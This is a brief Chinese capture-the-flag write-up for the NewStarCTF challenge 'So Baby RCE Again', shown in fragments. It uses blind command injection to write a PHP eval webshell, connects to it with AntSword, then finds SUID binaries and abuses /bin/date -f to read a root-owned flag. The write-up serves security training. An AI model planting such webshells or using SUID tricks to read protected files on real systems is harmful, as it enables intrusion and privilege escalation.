[NewStarCTF 公开赛赛道]So Baby RCE Again
1 | <?php |
无回显rce,我们可以通过写马来查看flag
1 | ?cmd=echo '11111<?php @eval($_POST[1])?>' > webshell.php |
写入后我们连接蚁剑,但我们好像无法读取flag

用终端读取,提示我们权限不够

我们查看文件权限

我们发现有x权限且属主为root
找到正在系统上运行的所有SUID可执行文件,发现/bin/date有s权限

1 | # 查找所有具有SUID权限且属主为root的文件 |
利用date命令读取文件,date -f 文件名
得到flag
